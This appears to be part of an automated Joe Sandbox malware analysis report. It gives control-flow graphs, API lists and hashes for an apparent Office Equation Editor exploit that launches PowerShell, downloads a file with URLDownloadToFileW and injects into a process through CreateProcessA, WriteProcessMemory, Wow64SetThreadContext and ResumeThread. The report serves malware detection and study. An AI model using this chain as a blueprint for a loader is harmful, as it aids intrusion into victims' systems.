                                                      control_flow_graph 126 354059c-35405ae ShellExecuteW 128 35405b5-35405b8 126->128 129 35405b0 call 35405c1 126->129 131 354060a 128->131 132 35405ba 128->132 129->128 135 3540612-3540616 131->135 136 354060c-3540610 131->136 133 35405bc-35405c6 ExitProcess 132->133 134 354062b-354062d 132->134 137 354063d-354063e 134->137 135->134 140 3540618-354061c 135->140 136->135 139 354061e-3540625 136->139 141 3540627 139->141 142 3540629 139->142 140->134 140->139 141->134 143 354062f-3540638 142->143 146 3540601-3540604 143->146 147 354063a 143->147 146->143 148 3540606 146->148 147->137 148->131
                                                      APIs
                                                      • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035405AE
                                                        • Part of subcall function 035405C1: ExitProcess.KERNEL32(00000000), ref: 035405C6
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.360002424.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExecuteExitProcessShell
                                                      • String ID:
                                                      • API String ID: 1124553745-0
                                                      • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                      • Instruction ID: 5f89af53eb54c035bbdc985f6e0b11d074369bb0230d6a3216afb6357ccc87c5
                                                      • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                      • Instruction Fuzzy Hash: 43012B74A4434221DB3CF668A8157F6EB54FBC1718FBC485AA7830B0F5C49480C38AE9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 149 3540587-3540589 151 354058e-3540594 149->151 152 3540589 call 354059c 149->152 153 3540596-35405b8 ShellExecuteW call 35405c1 151->153 154 35405fb-3540607 151->154 152->151 156 354060a 153->156 164 35405ba 153->164 154->156 157 3540612-3540616 156->157 158 354060c-3540610 156->158 161 3540618-354061c 157->161 162 354062b-354062d 157->162 158->157 160 354061e-3540625 158->160 166 3540627 160->166 167 3540629 160->167 161->160 161->162 165 354063d-354063e 162->165 164->162 169 35405bc-35405c6 ExitProcess 164->169 166->162 168 354062f-3540638 167->168 172 3540601-3540604 168->172 173 354063a 168->173 172->168 175 3540606 172->175 173->165 175->156
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.360002424.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExecuteExitProcessShell
                                                      • String ID:
                                                      • API String ID: 1124553745-0
                                                      • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                      • Instruction ID: 4eece9673d795352199976ebee2524ac5ba051073eb135073d9c1e60c8e61ed1
                                                      • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                      • Instruction Fuzzy Hash: 77012B7054830520E62DF6646C44BEAEB98FBC171CF78445AE3530B0F5C1848483869D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 176 35405c1-35405c6 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(00000000), ref: 035405C6
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.360002424.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                      • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                      • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                      • Instruction Fuzzy Hash:

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 178 35405c8-35405d3 GetPEB 179 35405d6-35405e7 call 35405f0 178->179 182 35405e9-35405ed 179->182
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.360002424.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                      • Instruction ID: 0d53e99e5730bdfa85d13c721a898358c3e7556a9c1d6c443e49568b158fa455
                                                      • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                      • Instruction Fuzzy Hash: 0AD05E712015028FC308DB04D940E53F37AFFD8210B28C264D6004B669E730E892CA90

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 183 354039a-354039f ExitProcess 184 35403a6-35403c1 call 35403cf 183->184 185 35403a1 call 35403b3 183->185 188 3540414-3540430 184->188 189 35403c4-35403c9 184->189 185->184 195 3540432-3540440 188->195 193 3540431 189->193 194 35403cc 189->194 193->195 196 3540441 194->196 197 35403ce-35403dd 194->197 199 3540442-354044e 195->199 196->199 200 354044f 197->200 201 35403df-35403e4 197->201 202 3540450-354045c 199->202 200->202 201->200 204 35403e6-35403ec 201->204 208 3540462-3540497 202->208 204->196 209 35403ee 204->209 209->208 211 35403f0-3540411 call 3540484 209->211 211->188
                                                      APIs
                                                      • ExitProcess.KERNEL32(03540388), ref: 0354039A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.360002424.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 23081c2f9d4407df301a849fb874a1b2adb20e461331d0472d76cb10e1f8a8a8
                                                      • Instruction ID: fbc607e76bae73ba74182570d08ad3662ac8afe0d997c61cfcc778367b2301fc
                                                      • Opcode Fuzzy Hash: 23081c2f9d4407df301a849fb874a1b2adb20e461331d0472d76cb10e1f8a8a8
                                                      • Instruction Fuzzy Hash: 7E3154BA90EBC11FD31AD7747A6A164FF60795300872C8ACE829A4B5F3E3649106E356

                                                      Execution Graph

                                                      Execution Coverage:7.1%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:35
                                                      Total number of Limit Nodes:4
                                                      execution_graph 3405 1f43b0 3406 1f452e 3405->3406 3407 1f43ee 3405->3407 3407->3406 3413 1f453b 3407->3413 3421 1f4775 3407->3421 3428 1f4548 3407->3428 3436 1f48d8 3407->3436 3408 1f450f 3414 1f4548 3413->3414 3415 1f4918 URLDownloadToFileW 3414->3415 3417 1f4660 3414->3417 3419 1f46d9 3414->3419 3418 1f49d8 3415->3418 3417->3408 3418->3408 3439 351880 3419->3439 3422 1f46ca 3421->3422 3425 1f46d9 3421->3425 3423 1f4918 URLDownloadToFileW 3422->3423 3422->3425 3426 1f49d8 3423->3426 3427 351880 3 API calls 3425->3427 3426->3408 3427->3425 3430 1f457c 3428->3430 3429 1f4918 URLDownloadToFileW 3433 1f49d8 3429->3433 3430->3429 3432 1f4660 3430->3432 3434 1f46d9 3430->3434 3432->3408 3433->3408 3435 351880 3 API calls 3434->3435 3435->3434 3437 1f4829 3436->3437 3437->3436 3438 351880 4 API calls 3437->3438 3438->3437 3440 3518a4 3439->3440 3442 1f453b 4 API calls 3440->3442 3443 1f4548 4 API calls 3440->3443 3444 1f4775 4 API calls 3440->3444 3446 1f4930 3440->3446 3441 351b94 3441->3419 3442->3441 3443->3441 3444->3441 3447 1f497b URLDownloadToFileW 3446->3447 3449 1f49d8 3447->3449 3449->3441

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 350998-3509aa 1 3509b0-3509c1 0->1 2 350a6a-350a70 0->2 7 3509c3-3509c9 1->7 8 3509db-3509f8 1->8 5 350a72-350a79 2->5 6 350a7b-350a9d 2->6 5->6 9 350a9f-350ade 6->9 10 350b0b-350b15 6->10 11 3509cd-3509d9 7->11 12 3509cb 7->12 8->2 16 3509fa-350a1c 8->16 32 350ae0-350aee 9->32 33 350b5b-350b60 9->33 13 350b17-350b1d 10->13 14 350b20-350b26 10->14 11->8 12->8 17 350b2c-350b38 14->17 18 350b28-350b2a 14->18 25 350a36-350a4e 16->25 26 350a1e-350a24 16->26 21 350b3a-350b58 17->21 18->21 36 350a50-350a52 25->36 37 350a5c-350a67 25->37 28 350a26 26->28 29 350a28-350a34 26->29 28->25 29->25 40 350af6-350b05 32->40 33->32 36->37 40->10
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.387070327.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: tPp$tPp
                                                      • API String ID: 0-1160507146
                                                      • Opcode ID: ea5c047d88a91c5deee80a13eb4620e700146d505c0ca96360fe0df3bc28f967
                                                      • Instruction ID: 9a338f174f8d44e5753f3b6bc14de3391e4caa5972127118509f5b8c404baa21
                                                      • Opcode Fuzzy Hash: ea5c047d88a91c5deee80a13eb4620e700146d505c0ca96360fe0df3bc28f967
                                                      • Instruction Fuzzy Hash: 71512931B013509FD7259B688450F6ABFA2EF85711F29806BED45DF392CA72DC45C3A1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 41 1f4548-1f457a 42 1f457c-1f4583 41->42 43 1f45c0 41->43 45 1f4585-1f4592 42->45 46 1f4594 42->46 44 1f45c3-1f45ff 43->44 55 1f4688-1f4693 44->55 56 1f4605-1f460e 44->56 47 1f4596-1f4598 45->47 46->47 49 1f459f-1f45a1 47->49 50 1f459a-1f459d 47->50 53 1f45a3-1f45b0 49->53 54 1f45b2 49->54 52 1f45be 50->52 52->44 57 1f45b4-1f45b6 53->57 54->57 58 1f4695-1f4698 55->58 59 1f46a2-1f46c4 55->59 56->55 60 1f4610-1f4616 56->60 57->52 58->59 68 1f478e-1f4826 59->68 69 1f46ca-1f46d3 59->69 61 1f461c-1f4629 60->61 62 1f4918-1f4982 60->62 64 1f467f-1f4686 61->64 65 1f462b-1f465e 61->65 73 1f498d-1f4993 62->73 74 1f4984-1f498a 62->74 64->55 64->60 80 1f467b 65->80 81 1f4660-1f4663 65->81 104 1f4829-1f4885 call 351880 68->104 69->62 72 1f46d9-1f4717 69->72 89 1f4719-1f472f 72->89 90 1f4731-1f4744 72->90 77 1f4995-1f499e 73->77 78 1f49a1-1f49d6 URLDownloadToFileW 73->78 74->73 77->78 82 1f49df-1f49f3 78->82 83 1f49d8-1f49de 78->83 80->64 85 1f466f-1f4678 81->85 86 1f4665-1f4668 81->86 83->82 86->85 92 1f4746-1f474d 89->92 90->92 94 1f474f-1f4760 92->94 95 1f4772 92->95 94->95 98 1f4762-1f476b 94->98 95->68 98->95 109 1f4887-1f4890 104->109 110 1f48aa-1f48bd 109->110 111 1f4892-1f48a8 109->111 112 1f48bf-1f48c6 110->112 111->112 113 1f48c8-1f48ce 112->113 114 1f48d5-1f48df 112->114 113->114 114->104
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.387002945.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1f0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aa8dc3448059d5fd6e18fd9f53985cd633d32e6a9f5e3e68d18233aba8fd0a65
                                                      • Instruction ID: 6b8c014c57810a084db03b69109034b940caa49e0ad4076bbbea31a8a7919aa7
                                                      • Opcode Fuzzy Hash: aa8dc3448059d5fd6e18fd9f53985cd633d32e6a9f5e3e68d18233aba8fd0a65
                                                      • Instruction Fuzzy Hash: 82E12974A00219AFDB05CF98D584AAEBBF2FF88310F258559E904AB365C771ED81CF90

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 228 1f4930-1f4982 230 1f498d-1f4993 228->230 231 1f4984-1f498a 228->231 232 1f4995-1f499e 230->232 233 1f49a1-1f49d6 URLDownloadToFileW 230->233 231->230 232->233 234 1f49df-1f49f3 233->234 235 1f49d8-1f49de 233->235 235->234
                                                      APIs
                                                      • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 001F49C9
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.387002945.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1f0000_powershell.jbxd
                                                      Similarity
                                                      • API ID: DownloadFile
                                                      • String ID:
                                                      • API String ID: 1407266417-0
                                                      • Opcode ID: f3c5499bf841082c68e72f0eb6edd25828d2ac01874f46c717fb8e74c1a1b425
                                                      • Instruction ID: 74760b3e5d5746c8f5454eed3003ddf0b3daaa8b1eec9345dd854bf940117568
                                                      • Opcode Fuzzy Hash: f3c5499bf841082c68e72f0eb6edd25828d2ac01874f46c717fb8e74c1a1b425
                                                      • Instruction Fuzzy Hash: 6B21F6B1D0161DDFCB00CF9AD984AEEFBB4FF48314F10852AE918A7250D374A954CBA1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 237 351880-35189e 238 3518a4-3518cb 237->238 239 351926-351975 237->239 244 3518e5-351913 238->244 245 3518cd-3518d3 238->245 256 35197c-35198f 239->256 254 351915-351917 244->254 255 351921-351924 244->255 246 3518d5 245->246 247 3518d7-3518e3 245->247 246->244 247->244 254->255 255->256 257 351995-3519bc 256->257 258 351a17-351a66 256->258 263 3519d6-351a04 257->263 264 3519be-3519c4 257->264 275 351a6d-351a80 258->275 273 351a06-351a08 263->273 274 351a12-351a15 263->274 265 3519c6 264->265 266 3519c8-3519d4 264->266 265->263 266->263 273->274 274->275 276 351a86-351aad 275->276 277 351b08-351b57 275->277 282 351ac7-351af5 276->282 283 351aaf-351ab5 276->283 294 351b5e-351b8c 277->294 292 351af7-351af9 282->292 293 351b03-351b06 282->293 285 351ab7 283->285 286 351ab9-351ac5 283->286 285->282 286->282 292->293 293->294 299 351b8f call 1f453b 294->299 300 351b8f call 1f4548 294->300 301 351b8f call 1f4775 294->301 302 351b8f call 1f4930 294->302 297 351b94-351bf0 299->297 300->297 301->297 302->297
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.387070327.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf442bf461aa11e96319139425e5ca6ddf5b153bf83f0ddde25f590e3d52ad2e
                                                      • Instruction ID: b7f4e8c3f80eb5c7ef3fee5350d663ce74ea831eb3496547f579eb36f8a14894
                                                      • Opcode Fuzzy Hash: bf442bf461aa11e96319139425e5ca6ddf5b153bf83f0ddde25f590e3d52ad2e
                                                      • Instruction Fuzzy Hash: 9681B130B002049FC729DB58D411B6EBBA2EBC8710F29856AEC59AB391CF71EC46D791

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 444 350a7d-350a9d 445 350a9f-350ade 444->445 446 350b0b-350b15 444->446 457 350ae0-350aee 445->457 458 350b5b-350b60 445->458 447 350b17-350b1d 446->447 448 350b20-350b26 446->448 449 350b2c-350b38 448->449 450 350b28-350b2a 448->450 452 350b3a-350b58 449->452 450->452 462 350af6-350b05 457->462 458->457 462->446
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.387070327.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a289734affbc5c1935f868dbc6e97dfa154f60766029f2030cf4f5329e459f0
                                                      • Instruction ID: e9c4251303a24a17d0b70b69162b9cc42dd998dbe77432c39cdb359433dbb47d
                                                      • Opcode Fuzzy Hash: 2a289734affbc5c1935f868dbc6e97dfa154f60766029f2030cf4f5329e459f0
                                                      • Instruction Fuzzy Hash: 3B012234B083842FD72253798960F6B6EA29FC2704F19805EF899DB3E2D962DC488361

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 494 19d01d-19d03d 495 19d08d-19d095 494->495 496 19d03f-19d04a 494->496 495->496 497 19d04c-19d05a 496->497 498 19d082-19d089 496->498 501 19d060 497->501 498->497 502 19d08b 498->502 503 19d063-19d06b 501->503 502->503 504 19d07b-19d080 503->504 505 19d06d-19d075 503->505 504->505 505->504
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.386967973.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_19d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 589d917a1c32f5077ff35183de25078a32e0ddfb6a5aa4aec8e31f01ff764865
                                                      • Instruction ID: 45572796d186486b6004b26a86f679f934c12829cdee7f17af45757161c92621
                                                      • Opcode Fuzzy Hash: 589d917a1c32f5077ff35183de25078a32e0ddfb6a5aa4aec8e31f01ff764865
                                                      • Instruction Fuzzy Hash: 8301A271504380AAEB244E29ECC4B67FFD8EF41724F2C851AFC494B286C779D845CAB1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 507 19d01c-19d03d 509 19d08d-19d095 507->509 510 19d03f-19d04a 507->510 509->510 511 19d04c-19d05a 510->511 512 19d082-19d089 510->512 515 19d060 511->515 512->511 516 19d08b 512->516 517 19d063-19d06b 515->517 516->517 518 19d07b-19d080 517->518 519 19d06d-19d075 517->519 518->519 519->518
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.386967973.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_19d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e978c01bb332839e6a795b876d865a6c19bdfca92fa8e99aae4c9ba2ac650edd
                                                      • Instruction ID: 4102b44c86bf485cb0afe9b24a2791318535ec5e7eead3d9b3ca916a25600fa9
                                                      • Opcode Fuzzy Hash: e978c01bb332839e6a795b876d865a6c19bdfca92fa8e99aae4c9ba2ac650edd
                                                      • Instruction Fuzzy Hash: 4AF06271404344AFEB108A16DCC4B66FFD8EB41728F18C55AED484E296C3799C45CAB1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 521 3500a0-3500cb 522 3500d1-3500d6 521->522 523 3502ce-3502d4 521->523 524 3500ee-3500f2 522->524 525 3500d8-3500de 522->525 533 3502d6-3502de 523->533 534 3502df-35031b 523->534 528 350277-350281 524->528 529 3500f8-3500fa 524->529 526 3500e0 525->526 527 3500e2-3500ec 525->527 526->524 527->524 535 350283-35028a 528->535 536 35028d-350293 528->536 531 3500fc-350108 529->531 532 35010a 529->532 538 35010c-35010e 531->538 532->538 533->534 539 350321-350326 534->539 540 35051e-350524 534->540 541 350295-350297 536->541 542 350299-3502a5 536->542 538->528 544 350114-350133 538->544 545 35033e-350342 539->545 546 350328-35032e 539->546 555 350526-35052e 540->555 556 35052f-350568 540->556 543 3502a7-3502cb 541->543 542->543 570 350135-350141 544->570 571 350143 544->571 549 3504c7-3504d1 545->549 550 350348-35034a 545->550 551 350330 546->551 552 350332-35033c 546->552 559 3504d3-3504da 549->559 560 3504dd-3504e3 549->560 557 35034c-350358 550->557 558 35035a 550->558 551->545 552->545 555->556 578 350582-350591 556->578 579 35056a-350570 556->579 562 35035c-35035e 557->562 558->562 563 3504e5-3504e7 560->563 564 3504e9-3504f5 560->564 562->549 567 350364-350383 562->567 569 3504f7-35051b 563->569 564->569 588 350385-350391 567->588 589 350393 567->589 573 350145-350147 570->573 571->573 573->528 577 35014d-350151 573->577 577->528 581 350157-35015b 577->581 590 350595-3505a1 578->590 591 350593 578->591 583 350574-350580 579->583 584 350572 579->584 586 35015d-35016c 581->586 587 35016e 581->587 583->578 584->578 592 350170-350172 586->592 587->592 593 350395-350397 588->593 589->593 596 3505a3-3505a7 590->596 591->596 592->528 597 350178-35017c 592->597 593->549 595 35039d-3503a1 593->595 595->549 598 3503a7-3503ab 595->598 597->528 600 350182-3501a1 597->600 601 3503ad-3503bc 598->601 602 3503be 598->602 608 3501a3-3501a9 600->608 609 3501b9-3501c4 600->609 603 3503c0-3503c2 601->603 602->603 603->549 605 3503c8-3503cc 603->605 605->549 607 3503d2-3503f1 605->607 620 3503f3-3503f9 607->620 621 350409-350414 607->621 610 3501ad-3501af 608->610 611 3501ab 608->611 612 3501c6-3501c9 609->612 613 3501d3-3501ef 609->613 610->609 611->609 612->613 615 3501f1-350204 613->615 616 35020c-350216 613->616 615->616 618 350218 616->618 619 35021a-350268 616->619 622 35026d-350274 618->622 619->622 625 3503fd-3503ff 620->625 626 3503fb 620->626 623 350416-350419 621->623 624 350423-35043f 621->624 623->624 628 350441-350454 624->628 629 35045c-350466 624->629 625->621 626->621 628->629 631 350468 629->631 632 35046a-3504b8 629->632 633 3504bd-3504c4 631->633 632->633
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.387070327.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$`8-$`8-$`8-$$p$$p
                                                      • API String ID: 0-2492973855
                                                      • Opcode ID: 2560eb11f2fbe3154c0fd7c884bbfd9f52d88d6436ec3fb023e5242654a99c2c
                                                      • Instruction ID: 7bb0c8649639c3cb89f635fad316d278bc4c9f7ba5f981849d66b6621baa81e0
                                                      • Opcode Fuzzy Hash: 2560eb11f2fbe3154c0fd7c884bbfd9f52d88d6436ec3fb023e5242654a99c2c
                                                      • Instruction Fuzzy Hash: 32E13935B00304DFDB1E9F68D414F6E7BA2AF84311F198466ED419B2A1CB72CD49DBA2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.387070327.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'p$4'p$4'p$4'p$|:-
                                                      • API String ID: 0-3489018080
                                                      • Opcode ID: 8d7cb821ee4c2cf68d4ee5ddf5ada0fe244bba1c29ceeffd1f9e36182f75af28
                                                      • Instruction ID: dbe5f2a24e388551bc582e4e28e753dcd399ba654c6587d3c9320006a9362eed
                                                      • Opcode Fuzzy Hash: 8d7cb821ee4c2cf68d4ee5ddf5ada0fe244bba1c29ceeffd1f9e36182f75af28
                                                      • Instruction Fuzzy Hash: A0911731B042408FCB6A9F78C410F6ABBA1AFC5312F2980ABD945CB265DB71CD89C791
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.387070327.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0;-$$p$$p$$p
                                                      • API String ID: 0-2097746193
                                                      • Opcode ID: 2e8abf73f78a9cc9e896cf41d97d7a4b5103e54d6a5ba55929e0fe183a5f8519
                                                      • Instruction ID: 4d2ad9ed9e698c537a81de07307ec8a19a43fcfa68f0fe04c309cc05c82d9cce
                                                      • Opcode Fuzzy Hash: 2e8abf73f78a9cc9e896cf41d97d7a4b5103e54d6a5ba55929e0fe183a5f8519
                                                      • Instruction Fuzzy Hash: 305102357043418FC7264A699420F7ABBA6AFC6322B2E847BDD45CB265EE71CC49D321

                                                      Execution Graph

                                                      Execution Coverage:12.3%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:90
                                                      Total number of Limit Nodes:8
                                                      execution_graph 9560 1ce6cd 9563 1cf538 9560->9563 9564 1cf54d 9563->9564 9567 1cf569 9564->9567 9568 1cf592 9567->9568 9571 1cf8c8 9568->9571 9572 1cf8dd 9571->9572 9585 d4043b 9572->9585 9591 d4021a 9572->9591 9596 d40189 9572->9596 9602 d4081f 9572->9602 9606 d4070f 9572->9606 9611 d4048d 9572->9611 9616 d40112 9572->9616 9622 d404d0 9572->9622 9627 d40280 9572->9627 9634 d40645 9572->9634 9639 d402b4 9572->9639 9573 1ce651 9586 d4046e 9585->9586 9587 d40a5a 9586->9587 9643 1cd5e8 9586->9643 9647 1cd5e1 9586->9647 9587->9573 9588 d40675 9588->9573 9592 d401aa 9591->9592 9593 d401c4 9591->9593 9592->9593 9651 1ce0f4 9592->9651 9655 1ce100 9592->9655 9593->9573 9597 d40105 9596->9597 9598 d4011c 9596->9598 9597->9573 9598->9597 9600 1ce0f4 CreateProcessA 9598->9600 9601 1ce100 CreateProcessA 9598->9601 9599 d401c4 9599->9573 9600->9599 9601->9599 9659 1cdd68 9602->9659 9663 1cdd61 9602->9663 9603 d4063e 9607 d40691 9606->9607 9608 d403f8 9607->9608 9609 1cdd68 WriteProcessMemory 9607->9609 9610 1cdd61 WriteProcessMemory 9607->9610 9608->9573 9609->9607 9610->9607 9612 d40496 9611->9612 9614 1cdd68 WriteProcessMemory 9612->9614 9615 1cdd61 WriteProcessMemory 9612->9615 9613 d40a0d 9614->9613 9615->9613 9617 d4011c 9616->9617 9618 d40180 9617->9618 9620 1ce0f4 CreateProcessA 9617->9620 9621 1ce100 CreateProcessA 9617->9621 9618->9573 9619 d401c4 9619->9573 9620->9619 9621->9619 9623 d4076f 9622->9623 9667 1cdec8 9623->9667 9671 1cdec1 9623->9671 9624 d401ef 9624->9573 9675 1cdc39 9627->9675 9679 1cdc40 9627->9679 9628 d4029e 9629 d403f8 9628->9629 9630 1cdd68 WriteProcessMemory 9628->9630 9631 1cdd61 WriteProcessMemory 9628->9631 9629->9573 9630->9628 9631->9628 9635 d40660 9634->9635 9637 1cd5e8 ResumeThread 9635->9637 9638 1cd5e1 ResumeThread 9635->9638 9636 d40675 9636->9573 9637->9636 9638->9636 9683 1cdb08 9639->9683 9687 1cdb10 9639->9687 9640 d402ce 9640->9573 9644 1cd62c ResumeThread 9643->9644 9646 1cd67e 9644->9646 9646->9588 9648 1cd62c ResumeThread 9647->9648 9650 1cd67e 9648->9650 9650->9588 9652 1ce187 CreateProcessA 9651->9652 9654 1ce3e5 9652->9654 9654->9654 9656 1ce187 CreateProcessA 9655->9656 9658 1ce3e5 9656->9658 9660 1cddb4 WriteProcessMemory 9659->9660 9662 1cde53 9660->9662 9662->9603 9664 1cddb4 WriteProcessMemory 9663->9664 9666 1cde53 9664->9666 9666->9603 9668 1cdf14 ReadProcessMemory 9667->9668 9670 1cdf92 9668->9670 9670->9624 9672 1cdf14 ReadProcessMemory 9671->9672 9674 1cdf92 9672->9674 9674->9624 9676 1cdc84 VirtualAllocEx 9675->9676 9678 1cdd02 9676->9678 9678->9628 9680 1cdc84 VirtualAllocEx 9679->9680 9682 1cdd02 9680->9682 9682->9628 9684 1cdb10 Wow64SetThreadContext 9683->9684 9686 1cdbd7 9684->9686 9686->9640 9688 1cdb59 Wow64SetThreadContext 9687->9688 9690 1cdbd7 9688->9690 9690->9640

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
